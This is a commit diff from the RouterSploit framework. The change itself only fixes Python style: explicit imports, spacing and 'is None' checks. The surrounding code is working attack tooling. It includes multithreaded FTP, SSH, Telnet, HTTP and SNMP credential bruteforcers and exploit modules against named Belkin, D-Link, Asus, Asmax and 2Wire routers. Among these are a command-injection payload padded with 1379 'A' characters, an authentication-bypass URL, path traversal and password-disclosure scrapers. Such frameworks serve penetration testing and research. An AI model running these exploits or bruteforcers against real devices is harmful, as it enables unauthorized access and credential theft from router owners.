Skip to content

R
routersploit
Commit d4152b25 by Leonardo Lazzaro
Options

fixed some PEP8 errors like mixed tabs and spaces, import *, etc

parent ebba273c
Showing with 483 additions and 306 deletions
routersploit/exceptions.py
class RoutersploitException(Exception):
pass
\ No newline at end of file
pass
routersploit/interpreter.py
......@@ -226,7 +226,7 @@ class RoutersploitInterpreter(BaseInterpreter):
if self.current_module:
try:
return self.module_prompt_template.format(host=self.prompt_hostname, module=self.module_metadata['name'])
except (AttributeError, KeyError) as e:
except (AttributeError, KeyError):
return self.module_prompt_template.format(host=self.prompt_hostname, module="UnnamedModule")
else:
return self.raw_prompt_template.format(host=self.prompt_hostname)
......@@ -362,7 +362,7 @@ class RoutersploitInterpreter(BaseInterpreter):
return sub_commands
@utils.module_required
def command_check(self, *args, **kwargs):
def command_check(self, *args, **kwargs):
try:
result = self.current_module.check()
except:
......
routersploit/modules/creds/ftp_bruteforce.py
......@@ -3,7 +3,15 @@ import ftplib
import socket
import itertools
from routersploit import *
from routersploit import (
exploits,
wordlists,
print_status,
print_error,
LockedIterator,
print_success,
print_table,
)
class Exploit(exploits.Exploit):
......@@ -14,8 +22,8 @@ class Exploit(exploits.Exploit):
__info__ = {
'name': 'FTP Bruteforce',
'author': [
'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
]
'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
]
}
target = exploits.Option('', 'Target IP address')
......@@ -99,6 +107,6 @@ class Exploit(exploits.Exploit):
except:
print_error(name, "Authentication Failed - Username: '{}' Password: '{}'".format(user, password))
ftp.close()
ftp.close()
print_status(name, 'process is terminated.')
routersploit/modules/creds/ftp_default.py
......@@ -2,7 +2,15 @@ import threading
import ftplib
import socket
from routersploit import *
from routersploit import (
exploits,
wordlists,
print_status,
print_error,
LockedIterator,
print_success,
print_table,
)
class Exploit(exploits.Exploit):
......@@ -13,8 +21,8 @@ class Exploit(exploits.Exploit):
__info__ = {
'name': 'FTP Default Creds',
'author': [
'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
]
'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
]
}
target = exploits.Option('', 'Target IP address')
......@@ -65,7 +73,7 @@ class Exploit(exploits.Exploit):
try:
line = data.next().split(":")
user = line[0].strip()
password = line[1].strip()
password = line[1].strip()
except StopIteration:
break
else:
......@@ -81,7 +89,7 @@ class Exploit(exploits.Exploit):
if retries > 2:
print_error("Too much connection problems. Quiting...")
return
try:
ftp.login(user, password)
......
routersploit/modules/creds/http_basic_bruteforce.py
......@@ -2,7 +2,16 @@ import threading
import requests
import itertools
from routersploit import *
from routersploit import (
exploits,
wordlists,
print_status,
print_error,
LockedIterator,
print_success,
print_table,
sanitize_url,
)
class Exploit(exploits.Exploit):
......@@ -13,8 +22,8 @@ class Exploit(exploits.Exploit):
__info__ = {
'name': 'HTTP Basic Bruteforce',
'author': [
'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
]
'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
......@@ -38,7 +47,7 @@ class Exploit(exploits.Exploit):
print_error("Invalid URL format: %s" % url)
return
except requests.exceptions.ConnectionError:
print_error("Connection error: %s" % url)
print_error("Connection error: %s" % url)
return
if r.status_code != 401:
......
routersploit/modules/creds/http_basic_default.py
import threading
import requests
from routersploit import *
from routersploit import (
exploits,
wordlists,
print_status,
print_error,
LockedIterator,
print_success,
print_table,
sanitize_url,
)
class Exploit(exploits.Exploit):
......@@ -12,8 +21,8 @@ class Exploit(exploits.Exploit):
__info__ = {
'name': 'HTTP Basic Default Creds',
'author': [
'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
]
'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
......@@ -35,7 +44,7 @@ class Exploit(exploits.Exploit):
print_error("Invalid URL format: %s" % url)
return
except requests.exceptions.ConnectionError:
print_error("Connection error: %s" % url)
print_error("Connection error: %s" % url)
return
if r.status_code != 401:
......
routersploit/modules/creds/http_form_bruteforce.py
......@@ -3,7 +3,16 @@ import requests
import itertools
from bs4 import BeautifulSoup
from routersploit import *
from routersploit import (
exploits,
wordlists,
print_status,
print_error,
LockedIterator,
print_success,
print_table,
sanitize_url,
)
class Exploit(exploits.Exploit):
......@@ -14,8 +23,8 @@ class Exploit(exploits.Exploit):
__info__ = {
'name': 'HTTP Form Bruteforce',
'author': [
'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
]
'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
......@@ -37,7 +46,7 @@ class Exploit(exploits.Exploit):
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
try:
r = requests.get(url)
requests.get(url)
except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema):
print_error("Invalid URL format: %s" % url)
return
......@@ -45,11 +54,11 @@ class Exploit(exploits.Exploit):
print_error("Connection error: %s" % url)
return
# authentication type
# authentication type
if self.form == 'auto':
self.data = self.detect_form()
if self.data == None:
if self.data is None:
print_error("Could not detect form")
return
else:
......@@ -105,10 +114,10 @@ class Exploit(exploits.Exploit):
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
r = requests.get(url)
soup = BeautifulSoup(r.text, "lxml")
form = soup.find("form")
if form == None:
if form is None:
return None
if len(form) > 0:
......@@ -116,21 +125,21 @@ class Exploit(exploits.Exploit):
for inp in form.findAll("input"):
if 'name' in inp.attrs.keys():
if inp.attrs['name'].lower() in ["username", "user", "login"]:
res.append(inp.attrs['name']+"="+"{{USER}}")
res.append(inp.attrs['name'] + "=" + "{{USER}}")
elif inp.attrs['name'].lower() in ["password", "pass"]:
res.append(inp.attrs['name']+"="+"{{PASS}}")
res.append(inp.attrs['name'] + "=" + "{{PASS}}")
else:
if 'value' in inp.attrs.keys():
res.append(inp.attrs['name']+"="+inp.attrs['value'])
res.append(inp.attrs['name'] + "=" + inp.attrs['value'])
else:
res.append(inp.attrs['name']+"=")
res.append(inp.attrs['name'] + "=")
return '&'.join(res)
def target_function(self, running, data):
name = threading.current_thread().name
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
print_status(name, 'process is starting...')
while running.is_set():
......@@ -153,4 +162,3 @@ class Exploit(exploits.Exploit):
break
print_status(name, 'process is terminated.')
routersploit/modules/creds/http_form_default.py
......@@ -2,7 +2,16 @@ import threading
import requests
from bs4 import BeautifulSoup
from routersploit import *
from routersploit import (
exploits,
wordlists,
print_status,
print_error,
LockedIterator,
print_success,
print_table,
sanitize_url,
)
class Exploit(exploits.Exploit):
......@@ -13,8 +22,8 @@ class Exploit(exploits.Exploit):
__info__ = {
'name': 'HTTP Form Default Creds',
'author': [
'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
]
'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
......@@ -35,7 +44,7 @@ class Exploit(exploits.Exploit):
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
try:
r = requests.get(url)
requests.get(url)
except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema):
print_error("Invalid URL format: %s" % url)
return
......@@ -43,11 +52,11 @@ class Exploit(exploits.Exploit):
print_error("Connection error: %s" % url)
return
# authentication type
# authentication type
if self.form == 'auto':
self.data = self.detect_form()
if self.data == None:
if self.data is None:
print_error("Could not detect form")
return
else:
......@@ -98,10 +107,10 @@ class Exploit(exploits.Exploit):
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
r = requests.get(url)
soup = BeautifulSoup(r.text, "lxml")
form = soup.find("form")
if form == None:
if form is None:
return None
if len(form) > 0:
......@@ -109,21 +118,21 @@ class Exploit(exploits.Exploit):
for inp in form.findAll("input"):
if 'name' in inp.attrs.keys():
if inp.attrs['name'].lower() in ["username", "user", "login"]:
res.append(inp.attrs['name']+"="+"{{USER}}")
res.append(inp.attrs['name'] + "=" + "{{USER}}")
elif inp.attrs['name'].lower() in ["password", "pass"]:
res.append(inp.attrs['name']+"="+"{{PASS}}")
res.append(inp.attrs['name'] + "=" + "{{PASS}}")
else:
if 'value' in inp.attrs.keys():
res.append(inp.attrs['name']+"="+inp.attrs['value'])
res.append(inp.attrs['name'] + "=" + inp.attrs['value'])
else:
res.append(inp.attrs['name']+"=")
res.append(inp.attrs['name'] + "=")
return '&'.join(res)
def target_function(self, running, data):
name = threading.current_thread().name
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
print_status(name, 'process is starting...')
while running.is_set():
......@@ -146,4 +155,3 @@ class Exploit(exploits.Exploit):
break
print_status(name, 'process is terminated.')
routersploit/modules/creds/snmp_bruteforce.py
import threading
import itertools
import netsnmp
import socket
from routersploit.utils import print_status, print_success, print_error, print_table, LockedIterator
from routersploit import exploits
......@@ -15,7 +13,7 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'SNMP Bruteforce',
'author': 'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
'author': 'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
}
target = exploits.Option('', 'Target IP address')
......@@ -45,7 +43,7 @@ class Exploit(exploits.Exploit):
print_table(headers, *self.strings)
else:
print_error("Valid community strings not found")
def target_function(self, running, data):
name = threading.current_thread().name
address = "{}:{}".format(self.target, self.port)
......@@ -57,9 +55,9 @@ class Exploit(exploits.Exploit):
string = data.next().strip()
bindvariable = netsnmp.Varbind(".1.3.6.1.2.1.1.1.0")
res = netsnmp.snmpget(bindvariable, Version = 1, DestHost = address, Community=string)
res = netsnmp.snmpget(bindvariable, Version=1, DestHost=address, Community=string)
if res[0] != None:
if res[0] is not None:
running.clear()
print_success("{}: Valid community string found!".format(name), string)
self.strings.append(tuple([string]))
......
routersploit/modules/creds/ssh_bruteforce.py
......@@ -3,7 +3,15 @@ import itertools
import socket
import paramiko
from routersploit import *
from routersploit import (
exploits,
wordlists,
print_status,
print_error,
LockedIterator,
print_success,
print_table,
)
class Exploit(exploits.Exploit):
......@@ -13,7 +21,7 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'SSH Bruteforce',
'author': 'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
'author': 'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
}
target = exploits.Option('', 'Target IP address')
......@@ -60,7 +68,7 @@ class Exploit(exploits.Exploit):
print_table(headers, *self.credentials)
else:
print_error("Credentials not found")
def target_function(self, running, data):
name = threading.current_thread().name
ssh = paramiko.SSHClient()
......
routersploit/modules/creds/ssh_default.py
......@@ -2,7 +2,15 @@ import threading
import paramiko
import socket
from routersploit import *
from routersploit import (
exploits,
wordlists,
print_status,
print_error,
LockedIterator,
print_success,
print_table,
)
class Exploit(exploits.Exploit):
......@@ -13,8 +21,8 @@ class Exploit(exploits.Exploit):
__info__ = {
'name': 'SSH Default Creds',
'author': [
'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
]
'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
]
}
target = exploits.Option('', 'Target IP address')
......@@ -39,12 +47,12 @@ class Exploit(exploits.Exploit):
pass
ssh.close()
if self.defaults.startswith('file://'):
defaults = open(self.defaults[7:], 'r')
else:
defaults = [self.defaults]
collection = LockedIterator(defaults)
self.run_threads(self.threads, self.target_function, collection)
......@@ -72,7 +80,7 @@ class Exploit(exploits.Exploit):
break
except paramiko.ssh_exception.SSHException as err:
ssh.close()
print_error(name, err,"Username: '{}' Password: '{}'".format(user, password))
print_error(name, err, "Username: '{}' Password: '{}'".format(user, password))
else:
running.clear()
print_success("{}: Authentication succeed!".format(name), user, password)
......
routersploit/modules/creds/telnet_bruteforce.py
......@@ -2,7 +2,15 @@ import threading
import itertools
import telnetlib
from routersploit import *
from routersploit import (
exploits,
wordlists,
print_status,
print_error,
LockedIterator,
print_success,
print_table,
)
class Exploit(exploits.Exploit):
......@@ -12,7 +20,7 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'Telnet Bruteforce',
'author': 'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
'author': 'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
}
target = exploits.Option('', 'Target IP address')
......@@ -55,7 +63,7 @@ class Exploit(exploits.Exploit):
print_table(headers, *self.credentials)
else:
print_error("Credentials not found")
def target_function(self, running, data):
name = threading.current_thread().name
......@@ -79,13 +87,13 @@ class Exploit(exploits.Exploit):
tn.write(password + "\r\n")
tn.write("\r\n")
(i,obj,res) = tn.expect(["Incorrect", "incorrect"], 5)
(i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
tn.close()
if i != -1:
print_error(name, "Username: '{}' Password: '{}'".format(user, password))
else:
if any(map(lambda x: x in res, ["#", "$",">"])) or len(res) > 500: # big banner e.g. mikrotik
if any(map(lambda x: x in res, ["#", "$", ">"])) or len(res) > 500: # big banner e.g. mikrotik
running.clear()
print_success("{}: Authentication succeed!".format(name), user, password)
self.credentials.append((user, password))
......@@ -100,5 +108,4 @@ class Exploit(exploits.Exploit):
return
continue
print_status(name, 'thread is terminated.')
routersploit/modules/creds/telnet_default.py
import threading
import telnetlib
from routersploit import *
from routersploit import (
exploits,
wordlists,
print_status,
print_error,
LockedIterator,
print_success,
print_table,
)
class Exploit(exploits.Exploit):
......@@ -12,8 +20,8 @@ class Exploit(exploits.Exploit):
__info__ = {
'name': 'Telnet Default Creds',
'author': [
'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
]
'Marcin Bury <marcin.bury[at]reverse-shell.com>' # routersploit module
]
}
target = exploits.Option('', 'Target IP address')
......@@ -40,7 +48,7 @@ class Exploit(exploits.Exploit):
defaults = open(self.defaults[7:], 'r')
else:
defaults = [self.defaults]
collection = LockedIterator(defaults)
self.run_threads(self.threads, self.target_function, collection)
......@@ -73,13 +81,13 @@ class Exploit(exploits.Exploit):
tn.write(password + "\r\n")
tn.write("\r\n")
(i,obj,res) = tn.expect(["Incorrect", "incorrect"], 5)
(i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
tn.close()
if i != -1:
print_error(name, "Username: '{}' Password: '{}'".format(user, password))
else:
if any(map(lambda x: x in res, ["#", "$",">"])) or len(res) > 500: # big banner e.g. mikrotik
if any(map(lambda x: x in res, ["#", "$", ">"])) or len(res) > 500: # big banner e.g. mikrotik
running.clear()
print_success("{}: Authentication succeed!".format(name), user, password)
self.credentials.append((user, password))
......@@ -92,6 +100,6 @@ class Exploit(exploits.Exploit):
if retries > 2:
print_error("Too much connection problems. Quiting...")
return
continue
continue
print_status(name, 'process is terminated.')
routersploit/modules/exploits/2wire/gateway_auth_bypass.py
import requests
import re
from routersploit import *
from routersploit import (
exploits,
print_success,
print_error,
sanitize_url,
)
class Exploit(exploits.Exploit):
......@@ -13,21 +17,21 @@ class Exploit(exploits.Exploit):
'name': '2Wire Gateway Auth Bypass',
'description': 'Module exploits 2Wire Gateway authentication bypass vulnerability. If the target is vulnerable link to bypass authentication is provided.',
'authors': [
'bugz', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'bugz', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://www.exploit-db.com/exploits/9459/',
],
'targets': [
],
'targets': [
'2Wire 2701HGV-W',
'2Wire 3800HGV-B',
'2Wire 3801HGV',
]
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(80, 'Target port') # default port
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
if self.check():
......@@ -40,7 +44,7 @@ class Exploit(exploits.Exploit):
def check(self):
# check if it is valid target
url = sanitize_url("{}:{}/".format(self.target, self.port))
try:
r = requests.get(url, verify=False)
res = r.text
......@@ -48,8 +52,8 @@ class Exploit(exploits.Exploit):
return None
if '<form name="pagepost" method="post" action="/xslt?PAGE=WRA01_POST&amp;NEXTPAGE=WRA01_POST" id="pagepost">' not in res:
return False
return False
# checking if authentication can be baypassed
url = sanitize_url("{}:{}/xslt".format(self.target, self.port))
try:
......@@ -57,9 +61,8 @@ class Exploit(exploits.Exploit):
res = r.text
except:
return None
if '<form name="pagepost" method="post" action="/xslt?PAGE=WRA01_POST&amp;NEXTPAGE=WRA01_POST" id="pagepost">' not in res:
return True # target vulnerable
return True # target vulnerable
return False # target not vulnerable
routersploit/modules/exploits/asmax/ar_1004g_password_disclosure.py
import requests
import re
from routersploit import *
from routersploit import (
exploits,
sanitize_url,
print_status,
print_error,
print_success,
print_table,
)
class Exploit(exploits.Exploit):
......@@ -60,7 +67,6 @@ class Exploit(exploits.Exploit):
else:
print_error("Credentials could not be found")
def check(self):
url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port))
......@@ -68,10 +74,9 @@ class Exploit(exploits.Exploit):
r = requests.get(url)
res = r.text
except:
return None # could not be verified
return None # could not be verified
if any(map(lambda x: x in res, ["pwdSupport", "pwdUser", "pwdAdmin"])):
return True # target vulnerable
return False # target not vulnerable
return False # target not vulnerable
routersploit/modules/exploits/asmax/ar_804_gu_rce.py
import requests
from routersploit import *
from routersploit import (
exploits,
print_success,
print_status,
print_error,
sanitize_url,
)
class Exploit(exploits.Exploit):
......@@ -11,8 +17,8 @@ class Exploit(exploits.Exploit):
__info__ = {
'name': 'Asmax AR 804 RCE',
'authors': [
'Michal Sajdak <michal.sajdak@securitum.com>', # vulnerability discovery
'Marcin Bury <marcin.bury@reverse-shell.com>', # routersploit module
'Michal Sajdak <michal.sajdak@securitum.com>', # vulnerability discovery
'Marcin Bury <marcin.bury@reverse-shell.com>', # routersploit module
],
'description': 'Module exploits Asmax AR 804 Remote Code Execution vulnerability which allows executing command on operating system level with root privileges.',
'references': [
......@@ -27,7 +33,7 @@ class Exploit(exploits.Exploit):
port = exploits.Option(80, 'Target Port')
def run(self):
if self.check() == True:
if self.check() is True:
print_success("Target is vulnerable")
print_status("Invoking command loop...")
self.command_loop()
......@@ -65,4 +71,3 @@ class Exploit(exploits.Exploit):
return True
return False
routersploit/modules/exploits/asus/rt_n16_password_disclosure.py
import requests
import re
from routersploit import *
from routersploit import (
exploits,
sanitize_url,
print_error,
print_success,
print_table,
)
class Exploit(exploits.Exploit):
......@@ -13,25 +19,25 @@ class Exploit(exploits.Exploit):
'name': 'Asus RT-N16 Password Disclosure',
'description': 'Module exploits password disclosure vulnerability in Asus RT-N16 devices that allows to fetch credentials for the device.',
'authors': [
'Harry Sintonen', # vulnerability discovery
'Marcin Bury <marcin.bury@reverse-shell.com>', # routersploit module
],
'Harry Sintonen', # vulnerability discovery
'Marcin Bury <marcin.bury@reverse-shell.com>', # routersploit module
],
'references': [
'https://sintonen.fi/advisories/asus-router-auth-bypass.txt'
],
'targets': [
],
'targets': [
'ASUS RT-N10U, firmware 3.0.0.4.374_168',
'ASUS RT-N56U, firmware 3.0.0.4.374_979',
'ASUS DSL-N55U, firmware 3.0.0.4.374_1397',
'ASUS RT-AC66U, firmware 3.0.0.4.374_2050',
'ASUS RT-N15U, firmware 3.0.0.4.374_16',
'ASUS RT-N53, firmware 3.0.0.4.374_311',
]
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(8080, 'Target port') # default port
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(8080, 'Target port') # default port
def run(self):
url = sanitize_url("{}:{}/error_page.htm".format(self.target, self.port))
......@@ -43,11 +49,11 @@ class Exploit(exploits.Exploit):
print_error("Invalid URL format: %s" % url)
return
except requests.exceptions.ConnectionError:
print_error("Connection error: %s" % url)
print_error("Connection error: %s" % url)
return
creds = re.findall("if\('1' == '0' \|\| '(.+?)' == 'admin'\)", res)
if len(creds):
c = [("admin", creds[0])]
print_success("Credentials found!")
......@@ -56,7 +62,6 @@ class Exploit(exploits.Exploit):
else:
print_error("Credentials could not be found")
def check(self):
url = sanitize_url("{}:{}/error_page.htm".format(self.target, self.port))
......@@ -64,11 +69,10 @@ class Exploit(exploits.Exploit):
r = requests.get(url)
res = r.text
except:
return None # could not be verified
return None # could not be verified
creds = re.findall("if\('1' == '0' \|\| '(.+?)' == 'admin'\)", res)
if len(creds):
return True # target vulnerable
return True # target vulnerable
return False # target not vulnerable
routersploit/modules/exploits/belkin/g_n150_password_disclosure.py
import requests
import re
from routersploit import *
from routersploit import (
exploits,
sanitize_url,
print_error,
print_success,
print_table,
)
class Exploit(exploits.Exploit):
......@@ -13,9 +19,9 @@ class Exploit(exploits.Exploit):
'name': 'Belkin G & N150 Password Disclosure',
'description': 'Module exploits Belkin G and N150 Password MD5 Disclosure vulnerability which allows fetching administration\'s password in md5 format',
'authors': [
'Aodrulez <f3arm3d3ar[at]gmail.com>', # vulnerability discovery
'Avinash Tangirala', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
'Aodrulez <f3arm3d3ar[at]gmail.com>', # vulnerability discovery
'Avinash Tangirala', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2765',
......@@ -58,12 +64,11 @@ class Exploit(exploits.Exploit):
r = requests.get(url, verify=False)
res = r.text
except:
return None # could not verify
return None # could not verify
val = re.findall('password = "(.+?)"', res)
if len(val):
return True # target vulnerable
return False # target is not vulnerable
return True # target vulnerable
return False # target is not vulnerable
routersploit/modules/exploits/belkin/g_plus_info_disclosure.py
import requests
import re
from routersploit import *
from routersploit import (
exploits,
sanitize_url,
print_error,
print_success,
print_table,
)
class Exploit(exploits.Exploit):
......@@ -13,8 +19,8 @@ class Exploit(exploits.Exploit):
'name': 'Belkin G Info Disclosure',
'description': 'Module exploits Belkin Wireless G Plus MIMO Router F5D9230-4 information disclosure vulnerability which allows fetching sensitive information such as credentials.',
'authors': [
'DarkFig', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
'DarkFig', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0403',
......@@ -38,7 +44,15 @@ class Exploit(exploits.Exploit):
print_error("Connection error: %s" % url)
return
var = ['pppoe_username','pppoe_password','wl0_pskkey','wl0_key1','mradius_password','mradius_secret','httpd_password','http_passwd','pppoe_passwd']
var = ['pppoe_username',
'pppoe_password',
'wl0_pskkey',
'wl0_key1',
'mradius_password',
'mradius_secret',
'httpd_password',
'http_passwd',
'pppoe_passwd']
data = []
for v in var:
......@@ -63,12 +77,19 @@ class Exploit(exploits.Exploit):
r = requests.get(url, verify=False)
res = r.text
except:
return None # could not verify
var = ['pppoe_username','pppoe_password','wl0_pskkey','wl0_key1','mradius_password','mradius_secret','httpd_password','http_passwd','pppoe_passwd']
return None # could not verify
var = ['pppoe_username',
'pppoe_password',
'wl0_pskkey',
'wl0_key1',
'mradius_password',
'mradius_secret',
'httpd_password',
'http_passwd',
'pppoe_passwd']
if any(map(lambda x: x in res, var)):
return True # target vulnerable
return False # target is not vulnerable
return False # target is not vulnerable
routersploit/modules/exploits/belkin/n150_path_traversal.py
import requests
from routersploit import *
from routersploit import (
exploits,
print_success,
print_error,
sanitize_url,
)
class Exploit(exploits.Exploit):
......@@ -12,9 +17,9 @@ class Exploit(exploits.Exploit):
'name': 'Belkin N150 Path Traversal',
'description': 'Module exploits Belkin N150 Path Traversal vulnerability which allows to read any file on the system.',
'authors': [
'Aditya Lad', # vulnerability discovery
'Rahul Pratap Singh', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
'Aditya Lad', # vulnerability discovery
'Rahul Pratap Singh', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://www.exploit-db.com/exploits/38488/',
......@@ -55,10 +60,9 @@ class Exploit(exploits.Exploit):
r = requests.get(url, verify=False)
res = r.text
except:
return None # could not verify
return None # could not verify
if "root:" in res:
return True # target vulnerable
return False # target is not vulnerable
return True # target vulnerable
return False # target is not vulnerable
routersploit/modules/exploits/belkin/n750_rce.py
import requests
from routersploit import *
from routersploit import (
exploits,
print_success,
print_status,
print_error,
sanitize_url,
)
class Exploit(exploits.Exploit):
......@@ -12,8 +18,8 @@ class Exploit(exploits.Exploit):
'name': 'Belkin N750 RCE',
'description': 'Module exploits Belkin N750 Remote Code Execution vulnerability which allows executing commands on operation system level.',
'authors': [
'Marco Vaz <mv[at]integrity.pt>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
'Marco Vaz <mv[at]integrity.pt>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1635',
......@@ -29,7 +35,7 @@ class Exploit(exploits.Exploit):
port = exploits.Option(80, 'Target Port')
def run(self):
if self.check() == True:
if self.check() is True:
print_success("Target is vulnerable")
print_status("Invoking command loop...")
self.command_loop()
......@@ -44,7 +50,7 @@ class Exploit(exploits.Exploit):
def execute(self, cmd):
url = sanitize_url("{}:{}/login.cgi.php".format(self.target, self.port))
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
data = "GO=&jump="+"A"*1379 + ";{};&ps=\n\n".format(cmd)
data = "GO=&jump=" + "A" * 1379 + ";{};&ps=\n\n".format(cmd)
try:
r = requests.post(url, headers=headers, data=data, verify=False)
......@@ -60,16 +66,15 @@ class Exploit(exploits.Exploit):
# todo random mark
url = sanitize_url("{}:{}/login.cgi".format(self.target, self.port))
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
data = "GO=&jump="+"A"*1379 + ";echo 9fdbd928b52c1ef61615a6fd2e8b49af;&ps=\n\n"
data = "GO=&jump=" + "A" * 1379 + ";echo 9fdbd928b52c1ef61615a6fd2e8b49af;&ps=\n\n"
try:
r = requests.post(url, headers=headers, data=data, verify=False)
res = r.text
except:
return None # could not verify
return None # could not verify
if "9fdbd928b52c1ef61615a6fd2e8b49af" in res:
return True # target vulnerable
return False # target is not vulnerable
return True # target vulnerable
return False # target is not vulnerable
routersploit/modules/exploits/dlink/dir_300_320_615_auth_bypass.py
import requests
import re
from routersploit import *
from routersploit import (
exploits,
print_success,
print_error,
sanitize_url,
)
class Exploit(exploits.Exploit):
......@@ -13,22 +17,22 @@ class Exploit(exploits.Exploit):
'name': 'D-Link DIR-300 & DIR-320 & DIR-615 Auth Bypass',
'description': 'Module exploits authentication bypass vulnerability in D-Link DIR-300, DIR-320, DIR-615 revD devices. It is possible to access administration panel without providing password.',
'authors': [
'Craig Heffner', # vulnerability discovery
'Karol Celin', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'Craig Heffner', # vulnerability discovery
'Karol Celin', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'http://www.devttys0.com/wp-content/uploads/2010/12/dlink_php_vulnerability.pdf',
],
'targets': [
],
'targets': [
'D-Link DIR-300',
'D-Link DIR-600',
'D-Link DIR-615 revD',
]
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(80, 'Target port') # default port
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
if self.check():
......@@ -47,21 +51,20 @@ class Exploit(exploits.Exploit):
r = requests.get(url)
res = r.text
except:
return None # could not be verified
return None # could not be verified
if '<form name="frm" id="frm" method="post" action="login.php">' not in res:
return False
return False
# checking if authentication can be baypassed
url = sanitize_url("{}:{}/bsc_lan.php?NO_NEED_AUTH=1&AUTH_GROUP=0".format(self.target, self.port))
try:
r = requests.get(url)
res = r.text
except:
return None # could not be verified
return None # could not be verified
if '<form name="frm" id="frm" method="post" action="login.php">' not in res:
return True # target vulnerable
return True # target vulnerable
return False # target not vulnerable
routersploit/modules/exploits/dlink/dir_300_600_615_info_disclosure.py
import requests
import re
from routersploit import *
from routersploit import (
exploits,
sanitize_url,
print_error,
print_success,
print_table,
)
class Exploit(exploits.Exploit):
......@@ -13,21 +19,21 @@ class Exploit(exploits.Exploit):
'name': 'D-Link DIR-300 & DIR-600 & DIR-615 Info Disclosure',
'description': 'Module explois information disclosure vulnerability in D-Link DIR-300, DIR-600, DIR-615 devices. It is possible to retrieve sensitive information such as credentials.',
'authors': [
'tytusromekiatomek <tytusromekiatomek[at]inbox.com>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'tytusromekiatomek <tytusromekiatomek[at]inbox.com>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'http://seclists.org/bugtraq/2013/Dec/11'
],
'targets': [
],
'targets': [
'D-Link DIR-300 (all)',
'D-Link DIR-600 (all)',
'D-Link DIR-615 (fw 4.0)',
]
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(80, 'Target port') # default port
target = exploits.Option('', 'Target address e.g. http://192.168.1.1') # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
